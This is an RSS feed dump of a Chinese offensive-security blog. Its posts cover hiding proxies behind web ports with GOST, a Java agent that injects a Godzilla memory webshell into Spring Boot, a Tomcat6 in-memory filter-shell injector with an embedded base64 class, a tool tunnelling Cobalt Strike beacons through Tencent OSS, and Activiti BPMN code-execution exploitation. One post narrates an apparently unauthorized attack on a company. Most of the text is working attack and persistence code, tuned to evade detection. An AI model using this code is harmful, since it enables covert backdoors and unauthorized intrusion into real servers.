Personal devices and the information they carry are incredibly valuable to their owners. It is only natural to want to protect your device like a royal family fortifying a medieval castle. Unlike medieval castles that depended upon layers and layers of protection (moats, drawbridges, spiky gates, etc.), personal devices thrive on just one defense: a devoted guard called antivirus software.
Increasing your personal device’s security detail with more than one guard, or antivirus software is actually less effective than using a single, comprehensive optionMicrosoft operating systems recognize the detriment of running two antivirus software programs simultaneously for real-time protection. Microsoft Windows automatically unregisters additional programs so they do not compete against each other. In theory, if you have a Microsoft device, you could run on-demand or scheduled scans from two different antivirus products without the operating system disabling one of them. But why invest in multiple software where one will do?
If you do not have a Microsoft device, here is what could happen to your device if you run more than one antivirus program at a time, and why you should consider investing in only one top-notch product.
Fight Over Potential Viruses
Antivirus programs want to impress you. Each wants to be the one to catch a virus and present you with the culprit, like a cat with a mouse. When antivirus software captures a virus, it locks it in a secure place to neutralize it. If you have two programs running simultaneously, they could engage in a tussle over who gets to scan, report, and remove the virus. This added activity could cause your computer to crash or use up your device’s memory.
Report Each Other as Suspicious
Antivirus software quietly monitors and collects information about how your system runs, which is similar to how viruses operate. One software could mark the other as suspicious because real-time protection software is lurking in the background. So, while one antivirus program is busy blowing the whistle on the other, malicious code could quietly slip by.
Additionally, users could be buried under a barrage of red flag notifications about each software reporting the other as suspicious. Some users become so distracted by the onslaught of notifications that they deactivate both programs, or ignore notifications altogetherleaving the device vulnerable to real threats.
Drain Your Battery and Slow Down Your Device
Running one antivirus software does not drain your battery, and it can actually make your device faster. However, two antivirus programs will not double your operating speed. In fact, it will make it run much slower and drain your battery in the process. With two programs running real-time protection constantly in the background, device performance is extremely compromised.
Antivirus Software Best Practices
There is no reason to invest in two antivirus programs when one solid software will more than do the trick to protect your device. Here are some best practices to get the most out of your antivirus software:
1Back up files regularly
One habit you should adopt is backing up your files regularly. You never know when malware could hit and corrupt your data. Add it to your weekly routine to sync with the cloud and back up your most important files to an external hard drive.
2. Keep your software up to date
Whenever your software prompts you to install an update, do it! New cyber threats are evolving every day, and the best way to protect against them is to allow your software to stay as up-to-date as possible.
3. Read the results reports
Always read your antivirus results reports. These reports let you know the suspicious suspects your software was busy rounding up. It will give you a good idea of the threats your devices face and perhaps the schemes that you unknowingly fell into, such as clicking on a link in a phishing emailThis information can also help you improve your online safety habits.
Quality Over Quantity
In the end, make sure that the antivirus software you choose is as robust as possible. For example, McAfee Total Protection can secure up to 10 devices and even offers features beyond antivirus protection, including safe web browsing, PC optimization, and home network security.
Stay Updated
To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, subscribe to our newsletter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.
Website Worth Calculatorsiteprice.org domain valuewebsite worth domain value
Source link
Leave a Reply
Your email address will not be published. Required fields are marked *
|
__label__pos
| 0.741459 |
Categories
Trend
Amazon Simple Storage Service S
Intranets can serve as highly effective instruments for communication inside a company. A great real-world example of the place an intranet helped an organization talk is when Nestle had a variety of meals processing crops in Scandinavia. Their central assist a(n) ______ is a third-party business that provides network services. system had to cope with a lot of requests for data every day. When Nestle determined to put money into an intranet, they quickly realized the financial savings.
An ebusiness entails the whole means of operating an organization on-line. Put merely, it’s all the exercise that takes place with a web-based business. Private labeling is a more applicable ecommerce approach for companies that will not have massive upfront capital or do not have their very own manufacturing unit area to fabricate goods.
TCP/IP has been adopted as a network standard for Internet communications. Thus, all hosts on the Internet observe the principles defined on this normal. Internet communications also use other standards, such because the Ethernet normal, as knowledge is routed to its destination. Consists of a single central cable, to which all computer systems and different devices join.
A solution with a pH of seven is claimed to be neutral, a solution with a pH higher than 7 is primary, and a solution with a pH less than 7 is acidic. Write a script that can immediate the user for the pH of a solution and will print whether it is impartial, fundamental, or acidic. ________ variables are outlined exterior all features and are accessible to any operate within their scope. Larger networks usually use a swap, while smaller networks use a hub. Using a community, folks communicate efficiently and simply via email, IM, blogs, and so forth.
Others use a special sort of wiring that allows as a lot as 260 connections. Since the storage available in cache servers is restricted, caching involves a strategy of selection of the contents value storing. Several cache algorithms have been designed to perform this process which, generally, leads to retailer the most well-liked contents. The cached contents are retrieved at a higher QoE (e.g., lower latency) and caching could be subsequently thought of a type of traffic differentiation. However, caching isn’t typically seen as a type of discriminatory visitors differentiation.
|
__label__pos
| 0.651254 |
Skip to content
Fetching contributors…
Cannot retrieve contributors at this time
184 lines (153 sloc) 6.59 KB
<?php
/*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* This software consists of voluntary contributions made by many individuals
* and is licensed under the MIT license. For more information, see
* <http://www.doctrine-project.org>.
*/
namespace Doctrine\DBAL;
use Doctrine\DBAL\Connection;
/**
* Utility class that parses sql statements with regard to types and parameters.
*
* @license http://www.opensource.org/licenses/lgpl-license.php LGPL
* @link www.doctrine-project.com
* @since 2.0
* @author Benjamin Eberlei <[email protected]>
*/
class SQLParserUtils
{
/**
* Get an array of the placeholders in an sql statements as keys and their positions in the query string.
*
* Returns an integer => integer pair (indexed from zero) for a positional statement
* and a string => int[] pair for a named statement.
*
* @param string $statement
* @param bool $isPositional
* @return array
*/
static public function getPlaceholderPositions($statement, $isPositional = true)
{
$match = ($isPositional) ? '?' : ':';
if (strpos($statement, $match) === false) {
return array();
}
$count = 0;
$inLiteral = false; // a valid query never starts with quotes
$stmtLen = strlen($statement);
$paramMap = array();
for ($i = 0; $i < $stmtLen; $i++) {
if ($statement[$i] == $match && !$inLiteral && ($isPositional || $statement[$i+1] != '=')) {
// real positional parameter detected
if ($isPositional) {
$paramMap[$count] = $i;
} else {
$name = "";
// TODO: Something faster/better to match this than regex?
for ($j = $i + 1; ($j < $stmtLen && preg_match('(([a-zA-Z0-9_]{1}))', $statement[$j])); $j++) {
$name .= $statement[$j];
}
$paramMap[$i] = $name; // named parameters can be duplicated!
$i = $j;
}
++$count;
} else if ($statement[$i] == "'" || $statement[$i] == '"') {
$inLiteral = ! $inLiteral; // switch state!
}
}
return $paramMap;
}
/**
* For a positional query this method can rewrite the sql statement with regard to array parameters.
*
* @param string $query The SQL query to execute.
* @param array $params The parameters to bind to the query.
* @param array $types The types the previous parameters are in.
*
* @return array
*/
static public function expandListParameters($query, $params, $types)
{
$isPositional = is_int(key($params));
$arrayPositions = array();
$bindIndex = -1;
foreach ($types as $name => $type) {
++$bindIndex;
if ($type !== Connection::PARAM_INT_ARRAY && $type !== Connection::PARAM_STR_ARRAY) {
continue;
}
if ($isPositional) {
$name = $bindIndex;
}
$arrayPositions[$name] = false;
}
if (( ! $arrayPositions && $isPositional) || (count($params) != count($types))) {
return array($query, $params, $types);
}
$paramPos = self::getPlaceholderPositions($query, $isPositional);
if ($isPositional) {
$paramOffset = 0;
$queryOffset = 0;
foreach ($paramPos as $needle => $needlePos) {
if ( ! isset($arrayPositions[$needle])) {
continue;
}
$needle += $paramOffset;
$needlePos += $queryOffset;
$count = count($params[$needle]);
$params = array_merge(
array_slice($params, 0, $needle),
$params[$needle],
array_slice($params, $needle + 1)
);
$types = array_merge(
array_slice($types, 0, $needle),
array_fill(0, $count, $types[$needle] - Connection::ARRAY_PARAM_OFFSET), // array needles are at PDO::PARAM_* + 100
array_slice($types, $needle + 1)
);
$expandStr = implode(", ", array_fill(0, $count, "?"));
$query = substr($query, 0, $needlePos) . $expandStr . substr($query, $needlePos + 1);
$paramOffset += ($count - 1); // Grows larger by number of parameters minus the replaced needle.
$queryOffset += (strlen($expandStr) - 1);
}
return array($query, $params, $types);
}
$queryOffset = 0;
$typesOrd = array();
$paramsOrd = array();
foreach ($paramPos as $pos => $paramName) {
$paramLen = strlen($paramName) + 1;
$value = $params[$paramName];
if ( ! isset($arrayPositions[$paramName])) {
$pos += $queryOffset;
$queryOffset -= ($paramLen - 1);
$paramsOrd[] = $value;
$typesOrd[] = $types[$paramName];
$query = substr($query, 0, $pos) . '?' . substr($query, ($pos + $paramLen));
continue;
}
$count = count($value);
$expandStr = $count > 0 ? implode(', ', array_fill(0, $count, '?')) : '?';
foreach ($value as $val) {
$paramsOrd[] = $val;
$typesOrd[] = $types[$paramName] - Connection::ARRAY_PARAM_OFFSET;
}
$pos += $queryOffset;
$queryOffset += (strlen($expandStr) - $paramLen);
$query = substr($query, 0, $pos) . $expandStr . substr($query, ($pos + $paramLen));
}
return array($query, $paramsOrd, $typesOrd);
}
}
Something went wrong with that request. Please try again.
|
__label__pos
| 0.995207 |
bug-gnu-emacs
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
bug#17298: 24.4.50; emacs_backtrace
From: Stefan Monnier
Subject: bug#17298: 24.4.50; emacs_backtrace
Date: Sat, 19 Apr 2014 13:55:39 -0400
User-agent: Gnus/5.13 (Gnus v5.13) Emacs/24.4.50 (gnu/linux)
> I really wish someone who knows those parts of Emacs would look into
> this problem.
I don't know those parts very well, but it seems that the patch below
might make sense.
I have a hard time believing that we've lived with such a bug for so
many years, but this makes the code agree with the comment, and if you
look at the diagram before the function, I think the comment is right
and the code is wrong.
Just to clarify the crucial part of the patch is:
- interval->total_length -= B->total_length - LEFT_TOTAL_LENGTH (interval);
+ interval->total_length -= B->total_length - TOTAL_LENGTH (c);
-- Stefan
=== modified file 'src/intervals.c'
--- src/intervals.c 2014-01-21 02:28:57 +0000
+++ src/intervals.c 2014-04-19 17:51:01 +0000
@@ -334,10 +334,16 @@
static INTERVAL
rotate_right (INTERVAL interval)
{
- INTERVAL i;
+ INTERVAL c;
INTERVAL B = interval->left;
ptrdiff_t old_total = interval->total_length;
+ eassert (TOTAL_LENGTH (interval) > 0);
+ eassert (TOTAL_LENGTH (interval)
+ > TOTAL_LENGTH (B) + TOTAL_LENGTH (interval->right));
+ eassert (TOTAL_LENGTH (B)
+ > TOTAL_LENGTH (B->left) + TOTAL_LENGTH (B->right));
+
/* Deal with any Parent of A; make it point to B. */
if (! ROOT_INTERVAL_P (interval))
{
@@ -348,23 +354,23 @@
}
copy_interval_parent (B, interval);
- /* Make B the parent of A */
- i = B->right;
+ /* Make B the parent of A. */
+ c = B->right;
set_interval_right (B, interval);
set_interval_parent (interval, B);
- /* Make A point to c */
- set_interval_left (interval, i);
- if (i)
- set_interval_parent (i, interval);
+ /* Make A point to c. */
+ set_interval_left (interval, c);
+ if (c)
+ set_interval_parent (c, interval);
/* A's total length is decreased by the length of B and its left child. */
- interval->total_length -= B->total_length - LEFT_TOTAL_LENGTH (interval);
- eassert (TOTAL_LENGTH (interval) >= 0);
+ interval->total_length -= B->total_length - TOTAL_LENGTH (c);
+ eassert (TOTAL_LENGTH (interval) > 0);
/* B must have the same total length of A. */
B->total_length = old_total;
- eassert (TOTAL_LENGTH (B) >= 0);
+ eassert (TOTAL_LENGTH (B) > 0);
return B;
}
@@ -381,7 +387,7 @@
static INTERVAL
rotate_left (INTERVAL interval)
{
- INTERVAL i;
+ INTERVAL c;
INTERVAL B = interval->right;
ptrdiff_t old_total = interval->total_length;
@@ -395,23 +401,23 @@
}
copy_interval_parent (B, interval);
- /* Make B the parent of A */
- i = B->left;
+ /* Make B the parent of A. */
+ c = B->left;
set_interval_left (B, interval);
set_interval_parent (interval, B);
- /* Make A point to c */
- set_interval_right (interval, i);
- if (i)
- set_interval_parent (i, interval);
+ /* Make A point to c. */
+ set_interval_right (interval, c);
+ if (c)
+ set_interval_parent (c, interval);
/* A's total length is decreased by the length of B and its right child. */
- interval->total_length -= B->total_length - RIGHT_TOTAL_LENGTH (interval);
- eassert (TOTAL_LENGTH (interval) >= 0);
+ interval->total_length -= B->total_length - TOTAL_LENGTH (c);
+ eassert (TOTAL_LENGTH (interval) > 0);
/* B must have the same total length of A. */
B->total_length = old_total;
- eassert (TOTAL_LENGTH (B) >= 0);
+ eassert (TOTAL_LENGTH (B) > 0);
return B;
}
reply via email to
[Prev in Thread] Current Thread [Next in Thread]
|
__label__pos
| 0.747704 |
Subclasificando una lista en python
Estoy siguiendo un tutorial en línea y el código es el siguiente:
class Hands(list): def __init__(self, size=0, die_class=None, *args, **kwargs): if not die_class: raise ValueError("You must provide a die class") super().__init__() for _ in range(size): self.append(die_class())
Básicamente, modela a un jugador con un número de dados ( size ) y qué dados tienen ( die_class ).
Mi confusión es por qué necesitamos llamar a super().__init__ ? Intenté ejecutar el código sin él y funcionó bien! ¿Por qué es necesaria la llamada?
__init__() llamar al __init__() si la clase base para asegurarse de que se ejecuta cualquier código de inicialización. Que (parece) que funcione sin esa llamada puede ser una coincidencia, o que simplemente no hayas encontrado el problema resultante todavía. Incluso si funciona de manera consistente en la versión de Python y la implementación que está utilizando actualmente, no se garantiza que otras versiones e implementaciones funcionen sin llamar al método __init__ clase base.
También puedes usar esa llamada para completar la lista con tus objetos dados:
class Hands(list): def __init__(self, size=0, die_factory=None): if not die_factory: raise ValueError('You must provide a die factory') super().__init__(die_factory() for _ in range(size))
He cambiado el nombre de die_class a die_factory ya que se puede usar cualquier objeto que produzca un nuevo objeto die.
Nota: Puede violar la relación is-a entre Hands y la list aquí, a menos que un objeto Hands realmente una list , es decir, todos los métodos y el comportamiento de las listas también tienen sentido para los objetos Hands .
super() permite evitar referirse explícitamente a la clase base. Más importante aún, con la herencia múltiple, puedes hacer cosas como esta . Al final del día, no es necesario, es solo una buena práctica.
|
__label__pos
| 0.93923 |
Go-gin implements api to change file configuration
There are two test environments dev and test. Due to the restrictions set by the official account, only two callback domain names can be set. The production environment occupies one, and the test can only switch back and forth. The test and the front end always ask which environment they are in. Write a script, be rude, to receive parameters, read files and regularize, and execute linux commands. (No error handling is not advisable)
Route 1: http://xx.com:8090/wechatGet the current environment
Route 2: http://xx.com:8090/wechat?env=XXModify the interface proxy environment of the nginx configuration file and reload the
program background hangs:nohup go run ./wechat_env.go &
package main
import (
"fmt"
"io/ioutil"
"log"
"net/http"
"os/exec"
"regexp"
"github.com/gin-gonic/gin"
)
var r = gin.New()
func main() {
gin.ForceConsoleColor()
r.Use(gin.Logger())
r.Use(gin.Recovery())
r.GET("/wechat", func(c *gin.Context) {
env := c.DefaultQuery("env", "")
filePath := "/etc/nginx/sites-enabled/new_wechat.conf"
msg := ""
switch env {
case "":
env = GetEnv(filePath)
msg = "当前环境为" + env
case "dev":
fallthrough
case "test":
// 修改配置
conf := ModifyConfig(env)
// 加载配置
NginxReload(conf, filePath)
msg = "环境切换" + env + "成功"
break
default:
msg = "环境参数错误"
}
c.JSON(http.StatusOK, gin.H{
"message": msg,
})
return
})
r.Run(":8090")
}
# 获取当前环境,使用正则匹配
func GetEnv(filePath string) string {
conf, _ := ioutil.ReadFile(filePath)
reg := regexp.MustCompile(`http://local\.yxt-up-api-([a-z]+)`)
result := reg.FindAllStringSubmatch(string(conf), -1)
log.Println("当前环境:" + result[0][1])
return result[0][1]
}
# 修改配置文件,其实只是模板的sprintf
func ModifyConfig(env string) string {
template := `
# %s
server {
listen 80;
server_name _;
root /vda2/var/www/new-wechat/dist;
location / {
try_files \$uri \$uri/ /index.html;
}
location /api/ {
proxy_pass http://local.yxt-up-api-%s/;
}
}
`
log.Println("修改环境为:" + env)
return fmt.Sprintf(template, env, env)
}
# 修改文件,并重加载nginx配置
func NginxReload(conf string, filePath string) {
cmd1 := `echo "` + conf + `" > ` + filePath
exec.Command("bash", "-c", cmd1).Run()
err := exec.Command("bash", "-c", "nginx -s reload").Run()
if err != nil {
log.Println(err)
}
}
Guess you like
Origin blog.csdn.net/z772532526/article/details/112479240
|
__label__pos
| 0.911238 |
/*---------------------------------------------------------------------------*\ ========= | \\ / F ield | OpenFOAM: The Open Source CFD Toolbox \\ / O peration | \\ / A nd | Copyright (C) 2011-2016 OpenFOAM Foundation \\/ M anipulation | Copyright (C) 2018 OpenCFD Ltd. ------------------------------------------------------------------------------- License This file is part of OpenFOAM. OpenFOAM is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. OpenFOAM is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with OpenFOAM. If not, see . \*---------------------------------------------------------------------------*/ #include "globalIndex.H" // * * * * * * * * * * * * * * * * Constructors * * * * * * * * * * * * * * // Foam::globalIndex::globalIndex(Istream& is) { is >> offsets_; } // * * * * * * * * * * * * * * * Member Functions * * * * * * * * * * * * * // void Foam::globalIndex::reset ( const label localSize, const int tag, const label comm, const bool parallel ) { offsets_.resize(Pstream::nProcs(comm)+1); labelList localSizes(Pstream::nProcs(comm), Zero); localSizes[Pstream::myProcNo(comm)] = localSize; if (parallel) { Pstream::gatherList(localSizes, tag, comm); Pstream::scatterList(localSizes, tag, comm); } label offset = 0; offsets_[0] = 0; for (label proci = 0; proci < Pstream::nProcs(comm); ++proci) { const label oldOffset = offset; offset += localSizes[proci]; if (offset < oldOffset) { FatalErrorInFunction << "Overflow : sum of sizes " << localSizes << " exceeds capability of label (" << labelMax << "). Please recompile with larger datatype for label." << exit(FatalError); } offsets_[proci+1] = offset; } } void Foam::globalIndex::reset(const label localSize) { offsets_.resize(Pstream::nProcs()+1); labelList localSizes(Pstream::nProcs(), Zero); localSizes[Pstream::myProcNo()] = localSize; Pstream::gatherList(localSizes, Pstream::msgType()); Pstream::scatterList(localSizes, Pstream::msgType()); label offset = 0; offsets_[0] = 0; for (label proci = 0; proci < Pstream::nProcs(); ++proci) { const label oldOffset = offset; offset += localSizes[proci]; if (offset < oldOffset) { FatalErrorInFunction << "Overflow : sum of sizes " << localSizes << " exceeds capability of label (" << labelMax << "). Please recompile with larger datatype for label." << exit(FatalError); } offsets_[proci+1] = offset; } } // * * * * * * * * * * * * * * * Friend Operators * * * * * * * * * * * * * // Foam::Istream& Foam::operator>>(Istream& is, globalIndex& gi) { return is >> gi.offsets_; } Foam::Ostream& Foam::operator<<(Ostream& os, const globalIndex& gi) { return os << gi.offsets_; } // ************************************************************************* //
|
__label__pos
| 0.999927 |
Sunshine Custom Object App Requirements
Sunshine Custom Object App Requirements
Sunshine Custom Objects let you define new object types in Zendesk, then create and persist objects based on those types. Relationships can be defined and managed between these and other custom objects, or with native Zendesk objects like tickets and users.
To create a Sunshine custom object app requirement, define a custom object type in your requirements.json file. This has the same structure and options as a Sunshine API object type, but omits the data key. You can define up to 50 custom objects per app.
Example
"custom_objects": { "custom_object_types": [ { "key": "product", "schema": { "properties": { "id": { "type": "string", "description": "The unique identifier for a product" }, "name": { "type": "string", "description": "The name of the product" } }, "required": ["id", "name"] } } ]}
Relationships
A relationship between custom objects can be specified with a custom object relationship type. This has the same structure and options as a Sunshine API relationship type, but omits the data key.
Example
"custom_objects": { "custom_object_relationship_types": [ { "key": "manufacturer", "source": "product", "target": "manufacturer" } ], "custom_object_types": [ { "key": "product", "schema": { "properties": { "id": { "type": "string", "description": "The unique identifier for a product" }, "name": { "type": "string", "description": "The name of the product" }, }, "required": ["id", "name"] } }, { "key": "manufacturer", "schema": { "properties": { "id": { "type": "string", "description": "The unique identifier for a manufacturer" }, "name": { "type": "string", "description": "The name of the manufacturer" }, }, "required": ["id", "name"] } } ]}
Relationship types can also be specified with native Zendesk object types including tickets and users. See Relationship Types in the Sunshine API documentation for more information.
|
__label__pos
| 0.998024 |
171S5.1_p - Cape Fear Community College
Report
MAT 171 Precalculus Algebra
Trigsted - Pilot Test
Dr. Claude Moore - Cape Fear Community College
CHAPTER 5:
Exponential and Logarithmic
Functions and Equations
5.1
5.2
5.3
5.4
5.5
5.6
Exponential Functions
The Natural Exponential Function
Logarithmic Functions
Properties of Logarithms
Exponential and Logarithmic Equations
Applications of Exponential and Logarithmic Functions
5.1 Exponential Functions
·Understand characteristics of exponential functions.
·Sketch graphs of exponential functions using transformations.
·Solve exponential equations by relating bases.
·Solve applications of exponential functions.
Omit Present Value on pages 5.1-21-23;
Example 7.
Exponential Function
The function f(x) = bx, where x is a real number, b > 0 and b ≠ 1, is
called the exponential function, base b.
The base needs to be positive in order to avoid the complex numbers that
would occur by taking even roots of negative numbers.
The following are examples of exponential functions:
Graphing Exponential Functions
To graph an exponential function, follow the steps listed:
1.
Compute some function values and list the results in a table.
2.
Plot the points and connect them with a smooth curve. Be sure to
plot enough points to determine how steeply the curve rises.
Example
Graph the exponential function y = f (x) = 2x.
Example (continued)
As x increases, y increases without bound; as x ∞, y
∞.
As x decreases, y decreases getting close to 0; as x -∞, y
0.
The x-axis, or the line y = 0, is a
horizontal asymptote. As the xinputs decrease, the curve gets
closer and closer to this line, but
does not cross it.
Example
Graph the exponential function
This tells us the graph is
the reflection of the graph
of y = 2x across the yaxis. Selected points are
listed in the table.
Example (continued)
As x increases, the
function values
decrease, getting closer
and closer to 0. The xaxis, y = 0, is the
horizontal asymptote.
As x decreases, the
function values increase
without bound.
Graphs of Exponential Functions
Observe the following graphs of exponential functions and look for
patterns in them.
For the base between 0 and 1, the graph
goes DOWN toward the x-axis to the
right.
For the base between greater than 1, the
graph goes UP to the right.
Example
Graph y = 2x – 2.
The graph is the graph of y = 2x shifted to right 2 units.
Example
Graph y = 5 – 0.5x .
The graph y = 2-x is a reflection of the graph of y = 2x across the y-axis;
y = - 2-x is a reflection across the x-axis;
y = - 2-x + 5 or y = 5 - 2x is a shift up 5 units.
Graph 3
Graph 1
Graph 2
y = 5 H.A.
Graph 4
1
Find the exponential function f(x) = bx whose graph is given as follows.
See the animation for the solutions.
http://media.pearsoncmg.com/ph/esm/esm_trigsted_colalg_1/anim/tca01_anim_0501ex04.html
The amount of money A that a principal P will grow to after t years at interest
rate r (in decimal form), compounded n times per year, is given by the formula
given below.
403/10. Math the function with one of the graphs: f(x) = 1 - ex
403/14. Graph the function by substituting and plotting points. Then check your
work using a graphing calculator: f(x) = 3-x
403/20. Graph the function by substituting and plotting points. Then check your work
using a graphing calculator: f(x) = 0.6 x - 3
403/4. Find each of the following, to four decimal places, using a calculator.
403/34. Sketch the graph of the function and check the graph with a graphing
calculator. Describe how the graph can be obtained from the graph of a basic
exponential function: f(x) = 3 (4 - x)
404/50. Use the compound-interest formula to find the account balance A with the
given conditions:
A = account balance; t = time, in years; n = number of compounding periods per
year; r = interest rate; P = principal
405/58. Growth of Bacteria Escherichia coli. The bacteria Escherichia coli are commonly found in the
human intestines. Suppose that 3000 of the bacteria are present at time t = 0. Then under certain conditions, t
minutes later, the number of bacteria present is N(t) = 3000(2)t/20.
a) How many bacteria will be present after 10 min? 20 min? 30 min? 40 min? 60 min?
b) Graph the function.
c) These bacteria can cause intestinal infections in humans when the number of bacteria reaches 100,000,000.
Find the length of time it takes for an intestinal infection to be possible.
407/76. Use a graphing calculator to match the equation with one of the figures
(a) - (n): y = 2 x + 2 -x
407/82. Use a graphing calculator to match the equation with one of the
figures (a) - (n): f(x) = (e x + e -x) / 2
407/84. Use a graphing calculator to find the point(s) of intersection of the
graphs of each of the following pairs of equations: y = 4 x + 4 -x and y = 8 - 2x
-x2
407/88. Solve graphically: ex = x3
similar documents
|
__label__pos
| 0.985593 |
Docs Menu
Embed an Authenticated Chart using a Custom JWT Provider
On this page
• Prerequisites
• Procedures
• Enable Authenticated Embedding for a Chart
• Configure Charts to use your Custom JWT Provider
• Create a Web App to Display your Chart
• Customize the Node.js App
Many websites use authentication systems that generate JWTs to represent a signed-in user. If your website produces JWTs, you can configure Charts to validate the existing tokens to authorize the rendering of embedded charts. Alternatively, if your site does not already use JWTs as a part of the authentication process, you can write code to generate JWTs explicitly for the purpose of authorizing chart renders.
This tutorial shows the latter approach. The example shows you how to generate a simple JWT for a logged in user and send it to Charts.
Charts uses the details you provided when you configure a provider to validate JWTs it receives with requests to render embedded charts. If the token is invalid or does not conform to the details you provided, Charts doesn't render the authenticated chart view.
Enable authenticated embedding to generate a Charts Base URL and a chart ID. You will need your Charts Base URL and chart ID to display your chart on a web page.
1
From your dashboard page, select the dashboard containing the chart you wish to embed.
2
From the dashboard, click at the top-right of the chart to access its embedding information. Select Embed Chart from the dropdown menu.
3
If you have already enabled external sharing on the data source this chart uses, skip this step. If you haven't yet enabled embedding on the data source, you can do so now. Click the Configure external sharing link.
4
Embed authenticated chart
5
6
You can specify a function to inject a MongoDB filter document for each user who views the chart. This is useful for rendering user-specific charts.
Example
The following filter function only renders data where the ownerId field of a document matches the value of the Embedding Authentication Provider's token's sub field:
function getFilter(context) {
return { ownerId: context.token.sub };
}
Tip
See also:
To learn more about injecting filters per user, see Inject User-Specific Filters.
7
Specify the fields on which chart viewers can filter data. By default, no fields are specified, meaning the chart cannot be filtered until you explicitly allow at least one field.
Tip
See also:
To learn more about filterable fields, see Specify Filterable Fields.
8
Use these values in your application code together with your Embedded Authentication Provider attributes to embed your chart.
Note
When you configure authentication using a custom JWT provider, you can choose the signing algorithm. This tutorial uses the HS256 signing algorithm. If you select the RS256 signing algorithm, you can also choose one of the following signing keys:
• JSON web key (JWK) or JSON web key set (JWKS) URL: Charts retrieves the key from the JWK or JWKS file at the specified URL. Charts then uses the key to validate the JSON web token. If there are multiple keys in the file, Charts tries each key until it finds a match.
• PEM public key: Charts uses the specified public key to verify the JSON web token.
1
1. If Charts is not already displayed, click Charts in the navigation bar.
2. Click Charts Settings in the sidebar.
2
3
Field
Value
Name
Enter charts-jwt-tutorial.
Provider
Select Custom JSON Web Token.
Signing Algorithm
Select HS256.
Signing Key
Enter topsecret.
4
If you already have an app in which to display your chart, you’re all set. If not, proceed with the remaining steps.
MongoDB offers a pre-built sample that shows you how to use the Embedding SDK to authenticate an embedded chart using a JWT.
Clone the GitHub repository and follow the instructions in the Readme file to begin using the app. You can customize it to use the chart you created earlier.
1
Warning
Generate JWTs server-side to protect your signing keys from exposure.
The app.js file in the sample application uses a simple web service and the jsonwebtoken package to generate and return a JWT signed using the HS256 algorithm when a user logs in to the application with these credentials:
• User name: admin
• Password: password
1const express = require("express");
2const bodyParser = require("body-parser");
3const cors = require("cors");
4const jwt = require("jsonwebtoken");
5const config = require("./config.js");
6
7const app = express();
8const port = 8000;
9
10// Configuring body parser middleware
11app.use(bodyParser.urlencoded({ extended: false }));
12app.use(bodyParser.json());
13app.use(cors());
14
15app.post("/login", (req, res) => {
16 const loginDetails = req.body;
17 // mock a check against the database
18 let mockedUsername = "admin";
19 let mockedPassword = "password";
20
21 if (
22 loginDetails &&
23 loginDetails.username === mockedUsername &&
24 loginDetails.password === mockedPassword
25 ) {
26 let token = jwt.sign({ username: loginDetails.username }, config.secret, {
27 expiresIn: "24h" // expires in 24 hours
28 });
29 res.json({ bearerToken: token });
30 } else {
31 res.status(401).send(false);
32 }
33});
34
35app.listen(port, () => console.log(`Example app listening on port ${port}!`));
Note
Your application must handle refreshing or issuing new tokens before they expire.
In the sample application, the signing key topsecret is defined in a file in your application named config.js:
module.exports = {
secret: "topsecret"
};
2
1. Create a new object from the ChartsEmbedSDK class. Provide:
• The value of the baseUrl property with the URL that points to your Charts instance. To embed one of your charts in the sample application, replace this value with the :guilabel:Base URL from your Embed Chart dialog.
• The chartId property to specify the unique identifier of the chart you want to embed. To embed one of your charts in the sample application, replace this value with the :guilabel:Chart ID from your Embed Chart dialog.
• The getUserToken property to specify the function that generates and returns a JWT from your authentication provider.
• Any optional properties you want to provide. For a list of all properties you can use when you embed charts using the SDK, see SDK option reference.
In the src/index.js file in the sample application, the login function in the getUserToken property calls the web service you created to generate a JWT. If login is successful, that function returns a valid JWT to the getUserToken property.
1import ChartsEmbedSDK from "@mongodb-js/charts-embed-dom";
2import "regenerator-runtime/runtime";
3
4document
5 .getElementById("loginButton")
6 .addEventListener("click", async () => await tryLogin());
7
8function getUser() {
9return document.getElementById("username").value;
10}
11
12function getPass() {
13return document.getElementById("password").value;
14}
15
16async function tryLogin() {
17if (await login(getUser(), getPass())) {
18 document.body.classList.toggle("logged-in", true);
19 await renderChart();
20}
21}
22
23async function login(username, password) {
24const rawResponse = await fetch("http://localhost:8000/login", {
25 method: "POST",
26 headers: {
27 Accept: "application/json",
28 "Content-Type": "application/json"
29 },
30 body: JSON.stringify({ username: username, password: password })
31});
32const content = await rawResponse.json();
33
34return content.bearerToken;
35}
36
37async function renderChart() {
38const sdk = new ChartsEmbedSDK({
39 baseUrl: "https://localhost/mongodb-charts-iwfxn", // ~REPLACE~ with the Base URL from your Embed Chart dialog
40 chartId: "d98f67cf-374b-4823-a2a8-f86e9d480065", // ~REPLACE~ with the Chart ID from your Embed Chart dialog
41 getUserToken: async function() {
42 return await login(getUser(), getPass());
43 }
44});
2. For each chart that you want to embed, invoke the CreateChart method of the object you just created. To embed one of your charts in the sample application, replace the value of the id property with the :guilabel:Chart ID from your Embed Chart dialog.
The following example shows an invocation of the CreateChart method in the src/index.js file in the sample application.
